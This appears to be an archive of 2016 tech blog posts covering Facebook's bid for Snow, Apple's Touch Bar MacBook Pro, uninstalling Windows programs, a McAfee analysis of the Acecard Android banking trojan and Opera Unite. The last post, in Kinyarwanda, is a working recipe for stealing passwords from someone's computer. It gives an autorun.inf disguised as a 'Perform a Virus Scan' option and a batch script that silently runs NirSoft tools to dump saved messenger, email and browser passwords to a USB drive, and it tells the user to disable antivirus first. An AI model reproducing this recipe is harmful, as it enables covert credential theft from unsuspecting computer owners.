Monday, October 31, 2016

Facebook tried to buy Asian Snapchat clone Snow

Here’s fuel to the fire for those who believe that Facebook will buy anything that looks, smells or moves like Snapchat. The U.S. social networking giant this summer made an unsuccessful bid to acquire Snow, a Snapchat-like service from Naver, the $25 billion-valued Korean firm behind chat app Line, a source close to the company told TechCrunch.

Snow currently has around 80 million downloads, and it is adding around 10 million more each month, according to the source. That growth has also encouraged acquisition interest from Tencent — the maker of blockbuster chat app WeChat — Alibaba and others, TechCrunch understands.

“It’s true that Snow is receiving love calls from various companies,” a representative from Naver told us in a statement. Despite acknowledging outside interest, Naver did not name Snow’s would-be suitors.

Facebook did not respond to requests for comment.

The app first grabbed attention in the summer when it raced up Android and iOS app store rankings in Korea, Japan and China, collecting some 30 million downloads. A feature story from The New York Times in July, which explained that Snow and Naver were exploiting Snapchat’s apparent lack of interest in Asia, only served to heighten awareness of the app.

Sometime after that story, Facebook CEO Mark Zuckerberg got wind of Snow and contacted Naver Chairman Hae-Jin Lee over the phone with an offer to acquire it. Naver saw Line raise over $1 billion in a dual Japan-U.S. IPO in July of this year, and Lee rejected Facebook’s overtures because he believes Snow has the potential to become a similar success.

Indeed, Naver strengthened ties between the two services in September when Line made a $45 million investment in Snow that gave the social app a valuation of $180 million — not bad for a one-year-old project. With Line struggling to grow its userbase outside of its largest markets of Japan, Thailand and Taiwan, Snow is viewed as a key ally that could help the chat app broaden its appeal in more parts of Asia.

While it is easy to label Snow as a Snapchat clone, the app does have some differentiated features.

For one thing, Naver has worked hard to localize the service in markets, much the same way as it did with Line when the chat app emerged in 2011-2012. Most notably, it is working with celebrities in Korea and Japan, where it sees the most traction and potential, to feature their stories prominently inside the app alongside live streams, too. That helps encourage users back into the app for more reasons than simply to message their friends, while it also may unlock monetize options in the future.

The app itself has over 36 filters and more than 200 masks, offering considerably more customization options than Snapchat — a move that is in line with appealing to its core audience in Asia. Some options include filters for both images and videos that involve celebrities, cartoon characters, fairies and even one scene as a drunken ‘salary man’ making a toast.

snow-filters

Snapchat — now just ‘Snap’ — is widely reported to be gearing up for an IPO next year thatcould value the company at around $25 billion. The latest suggestion is that it could raise $4 billion from a listing.

Those figures certainly vindicate CEO Evan Spiegel’s decision to reject a $3 billion bid from Facebook three years ago — even if conventional wisdom at the time suggested he was making a mistake.

It is still early days for Snow, and it remains to be seen whether this will be another app that Facebook will rue missing out on over time.

For now, Facebook is trying to turn its own properties into Snapchat-like competitors using heavy doses of ‘product inspiration’.

Instagram Stories, a feature that the company admits is inspired by Snapchat, reached a very respectable 100 million users within two months, while Facebook has launched smaller projects that include a social video app that’s just for teensa Snapchat-like camera feature, and a fairly blatant Snapchat clone that is being tested in Poland.

Friday, October 28, 2016

Apple unveils the new Touch Bar-powered MacBook Pro

Apple on Thursday revealed its newest MacBook Pro laptop, which includes a new interactive, customizable touch strip above the keyboard called Touch Bar.

"The Mac is more than a product to us," CEO Tim Cook told the crowd at the Town Hall auditorium at the company's Cupertino, California, headquarters. "It's a testament to everything we do and everything we create at Apple."

Instead of including a full-blown touchscreen like most new Windows computers, Apple offered up the Touch Bar. The bar lights up with a menu of buttons, control sliders, dials and tools, which change with the app you're using. Taking the place of function keys, the Touch Bar brings up autofill choices as you type, lets you edit videos in Final Cut Pro or straighten photos in the Photos app. Users can also customize the Touch Bar by dragging and dropping new tools into it.

The new MacBook Pro is also the first Mac to include Touch ID. That feature was added right into the Touch Bar where the power button has been located. It allows users to log into their devices with their thumbprints (you can also have multiple accounts for shared family computers) and securely pay for items online with Apple Pay.

Apple is hoping these new MacBook Pros will reinvigorate its computer sales amid a bruising downturn in the PC market. The company is also facing new competition from Microsoft, which on Wednesday revealed the new Surface Studio all-in-one desktop computer and has bulked up its line of Surface devices.

"Apple's laptops no longer enjoy the kind of big hardware advantage they've had in the past," said analyst Jan Dawson of Jackdaw Research on Thursday. He said the big difference he sees now is the "philosophical approach" between Apple and Microsoft of offering a touchscreen PC or not.

There are two sizes of the new MacBook Pro. The 13-inch model of the MacBook Pro is 14.9mm thick, weighs 3 pounds and starts at $1,799. The 15-inch model is 15.5mm thick, weighs 4 pounds and starts at $2,399. That's compared to 18mm for the previous 13- and 15-inch Pros, which were both about a half pound heavier than their replacements.

There is also another 13-inch MacBook Pro without Touch Bar and Touch ID, priced at $1,499. While Apple will continue to produce the 13-inch MacBook Air, it positioned this lower-tier MacBook Pro as a potential replacement.

Additionally, the new MacBook Pros include larger trackpads, refined keyboard designs, brighter displays that consume less energy, and redesigned speakers. Overall, the new MacBooks have about 10 hours of battery life, equal to the older 13-inch MacBook Pros and an hour longer than the older 15-inch machines.

Ahead of Thursday's event, rumors circulated about a new MacBook Pro with an OLED touch bar above the keyboard.

Apple's line of MacBook laptops and iMac desktops has faced double-digit declines in sales for most of the past year. Mac's weakness comes at a bad time for the company, since the iPhone -- Apple's biggest moneymaker -- has also seen three straight quarters of weaker sales and its iPad tablet business is struggling to keep up growth.

Apple's last big change to the MacBook line came in March 2015, when the tech giant revealed the new MacBook, a super-slim laptop with a force-sensitive track pad and just two ports, a USB-C port and headphone jack. During that March product event, Apple also updated the MacBook Pro and MacBook Air with faster processors.

While these devices failed to re-energize sales, the Mac line remains a very important one for Apple, not just because it was founded as a personal-computer company. Macs continue to generate billions of dollars in sales for Apple, helping the company diversify its revenue and avoid relying too heavily on the iPhone.

Monday, October 24, 2016

8 Ways to remove programs and modern apps in Windows

From time to time, I stumble upon applications that are hard to remove. Sometimes their Add/Remove Programs entry disappears for whatever reason or they don’t have a handy Uninstall shortcut available, and so on. The problems vary from case to case. That’s why I decided to make a roundup of all the methods that can be used to remove both desktop programs and modern apps, in Windows.

NOTE: This guide applies to Windows 7, Windows 8.1 and Windows 10.



1. Uninstall desktop applications from the Control Panel


This is the method most people know about. It works great for all desktop applications but it cannot be used for modern apps that are distributed through the Windows Store in Windows 8.1 and Windows 10.

First open the Control Panel. If you don’t know how, here are some guides to help you:

Then go to “Programs -> Programs and Features”.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

Select the desktop application that you want to remove, click or tap Uninstall and follow the wizard.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

Please remember that the steps involved in removing a program are different from program to program.

2. Uninstall desktop programs using their Uninstall shortcuts


Some desktop applications, when installed, create an Uninstall shortcut. This is generally found in the application’s folder in the Start Menu (in Windows 7 and Windows 10) or the Apps View (in Windows 8.1). Below you can see theUninstall shortcut for Dropbox, in Windows 8.1.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

Here is the Uninstall shortcut for Fitbit Connect, in Windows 10.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

Click the Uninstall shortcut to start the uninstallation wizard for the selected application.

Please keep in mind that Uninstall shortcuts are sometimes also placed on the Desktop. Double-click on them to start the uninstall procedure.

3. Uninstall desktop apps using their Uninstall.exe


Many desktop apps (especially those which create Uninstall shortcuts) have an executable file named uninstall.exe or something along these lines. This file is always found in the installation folder of that application. You can see below the uninstall.exe file for the VLC Player.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

Run it and follow the steps required to uninstall the program.

4. Uninstall desktop apps using their setup MSI file


Some programs (like the 64-bit version of 7-Zip) do not use a setup.exe file for their installation. Instead their setup file has the extension ".msi". This format is used by the Windows Installer, a special installation format created by Microsoft for its Windows operating systems. The desktop applications that use an ".msi" installer are very easy to uninstall. You right click or press and hold on their setup file and click or tap Uninstall.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

The removal can also be triggered from the command line. Open the Command Prompt as administrator and type“msiexec /x ” followed by the name of the ".msi" file used by the program you want to remove.

remove, uninstall, apps, desktop, programs, applications, Windows 10, Windows 8.1

You can also add other command line parameters to control the way the uninstall is done. For more information, check this article from Microsoft: Msiexec (command-line options).
If you are interested in how to remove modern apps from Windows, which are distributed using the Windows Store, read the second page in this guide.

Monday, October 17, 2016

Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card

While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification methods.

Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.

The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerousAndroid banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.

Once successfully installed, the trojan asks users for a number of device's permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.

Acecard Steals your Payment Card and Real ID details


android-banking-malware

The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.
"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."

Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for "verification purposes," and even requests a photo of the front and back sides of their ID card.

After this, the Trojan also prompts to ask users to hold their ID card in their hand, underneath their face, and take a selfie.

Hackers can make illegal Transfers and Take Over your Online Accounts


All these pieces of information are more than enough for an attacker to verify illegal banking transactions and steal access to victims' social media accounts by confirming the stolen identities.

So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.

This social engineering trick of Trojan obviously is not new, and any tech-savvy users would quickly catch this malicious behavior as there is no reason for Google to ask for your ID card. But the trick still works with non and less technical users.

Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.

Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.

Android Banking Trojan Asks for Selfie With Your ID

In the first half of 2016 we noticed that Android banking Trojans had started to improve their phishing overlays on legitimate financial apps to ask for more information. Victims were requested to provide “Mother’s Maiden Name,” “Father’s Middle Name,” “Maternal Grandmothers Name,” or a “Memorable Word.” Attackers used that data to respond to security questions and obtain illegal access to the victims’ bank accounts.

Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information. In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.

Like most Android banking Trojans, this threat also tricks users into installing the malware by pretending to be an adult video app or a codec/plug-in necessary to see a specific video:

acecard_app_logos
As soon as the malicious app is executed by the user, it hides the icon from the home launcher and constantly asks for device administrator privileges to make its removal difficult:

acecard_deviceadmin
When it is running in the background, the malware constantly monitors the opening of specific apps to show the user its main phishing overlay, pretending to be Google Play and asking for a credit card number:

acecardphishingoverlay
Once the credit card number is validated, the next phishing overlay asks for more personal and credit card information such as cardholder name, date of birth, phone number, credit card expiration date, and CCV:

acecard_phishing_overlay_personal

Depending on the type of the credit card that the user entered in the first phishing overlay, the malware will also ask for a second factor of authentication:

acecard_hk
In the preceding case, the malware asks for the HK (Hong Kong) ID. This new variant also targets users in Singapore, asking for the National Registration Identity Card and the Singaporean passport:

acecard_sg

After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license):

acecard_identityconf_step1and2
The final step asks for a selfie with the identity document:

acecard_selfi

Why are Android banking Trojans so popular? One possible reason is the exploit kit GM Bot, whose source code was leaked in February. (IBM SecurityIntelligence blogged about it.)

Android banking Trojans such as Acecard are constantly evolving and improving their social engineering attacks to gain as much sensitive and private information as possible. Attackers want not only a victim’s credit card information and different factors of authentication to financial services, but also a picture of the victim with identity document to remotely access to different systems. To protect yourselves from this threat, employ security software on your mobile, avoid downloading and installing apps from untrusted sources, and do not trust screens that ask for financial and personal information.

McAfee Mobile Security detects this threat as Android/Torec and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit http://www.mcafeemobilesecurity.com.

Targeted apps

  • com.android.vending

  • com.google.android.music

  • com.google.android.videos

  • com.google.android.play.games

  • com.google.android.apps.books

  • com.whatsapp

  • com.viber.voip

  • com.dropbox.android

  • com.tencent.mm

  • jp.naver.line.android

Thursday, October 13, 2016

How to Turn Your Home Computer into a Web Server

Before getting into the actual process, let’s look at a couple of real-world situations that explain why you may want to turn your home computer into a web server.

Situation #1. Say you have music MP3s, documents and other important files on the hard drive of your home computer. If you turn this home computer into a web server, you will be able to access all these files from office or any other Internet connected machine including your mobile phone.

Situation #2. You have some personal photographs that you want to share with other family members. You can either upload these pictures online to a site like Flickr or better still, just convert the computer into a web server. Now you can connect the camera to the computer, transfer the digital pictures to some designated folder and they’ll instantly become available to your friends and family anywhere in the world.

Situation #3. You want to host a website on the internet but the web hosting jargon like FTP, DNS, etc. is way too complex for you. The workaround therefore is that you setup a web server on your home computer (it’s easy) and then host a website in seconds without spending a single penny on external web hosting services.

Now if any of the above reasons look convincing enough, here’s how you can convert your Windows, Mac or Linux PC into a web server in less than two minutes – no technical knowledge required.

Download the Opera Unite software and install it. Congratulations, you are now running a web server on your machine and just need another minute to configure local file folders that you want to share with others over the internet.

Here’s an illustrated screenshot of the configuration panel – nothing technical here again.

webserver

Start the Opera Web browser (yes, that’s also you web server now) and enable the Opera Unite service from the lower left corner. Now double click the File Sharing link and select the folder whose content you want to share on the web. Any file or folder inside this folder can now be accessed over the internet – you can either use a public URL or specify a password for private sharing.

The following screencast video has more detailed instructions on how to get started with Opera Unite.


[embed]https://youtu.be/zeoHVeBwIsY[/embed]


Wednesday, October 12, 2016

Dore uuburyo wakwiba ama password yakoreshejwe kuri mudasobwa mu gihe cyahise.

Tugiye Kurebera Hamwe uko wa Kwiba cyangwa wabona Password zitandukanye ukoresheje Flash, gusa muratwihanganira ko amagambo amwe n’amwe agaruka mu ndimi z’amahanga kuko bitoroshye kuyabonera ikinyarwanda, nk’uko mubizi Windows ibika ama Password yamwe mu bintu dukoresha buri munsi nka messenger passwords , MSN, Yahoo, AOL, Windows messenger ,…. Hamwe na Outlook Express, SMTP, POP, FTP ikoreshe uburyo bwa auto-complete passwords itagwa na ama Browser amwe nka Internet Explorer na FireFox.Ushobora gukoresha ama Tools yo kurikavaringa (Recover) izo password ukoreshe USB PenDrive.
Ibikenewe:
MessenPass: Ikoreshwa mu gukora Recover ya Password za MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, and GAIM.
Mail PassView: Ikoreshwa mu gukora Recover ya Password za email nka: Outlook Express, Microsoft Outlook 2000 (POP3 na SMTP Accounts gusa), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP na SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

IE Passview: Ikoreshwa mu gukora Recover ya Password za Internet Explorer
Protected Storage PassView: Ikoreshwa mu gukora Recover ya Password zabitswe n’ama Browser atandukanye
Hamwe n’izindi nyinshi nka PasswordFox, …
Bitewe naho ugiye gukura Password ukoreshwa izi Tools twashyize Hano
Dore Uko Bikorwa:
Icyitonderwa: Hagarika byagahe gato AntiVirus yawe.
1. Kora Download y’ayo ma Tools 5 twavuze haruguru ubundi uzishyire kuri Flash yawe
(mspass.exe, mailpv.exe, iepv.exe, pspv.exe na passwordfox.exe).
2. Fungura NotePad ubundi Wandikemo
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Ubundi uyibike (Save) Kuri iri izina
New Text Document.txt to autorun.inf
Kora Copy ya autorun.inf kuri Flash Yawe
3. Fungura indi NotePad nshya ubundi wandikemo
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Yibike ubundi uyihe iri zina
New Text Document.txt to launch.bat
Kora Copy ya launch.bat file kuri Flash yawe
Ubu Flash yawe yiteguye gukoresha mukuzana Password.
1. Shyira Flash yawe kuri mashine kuri Message ubona hitamo Option yambere (Perform a Virus Scan)
2. Ubu za Tookit washyizeho zitangira gukora akazi kazo zifata buri Password yose zikabika muri .txt document.
3. Scan irangiye Password zose ushobora kuzibona muri ya Text Document.
Icyitonderwa: Izana Password zakoreshejwe kuri mashine, kuma browser, applicatio . Muri Version zose za Windows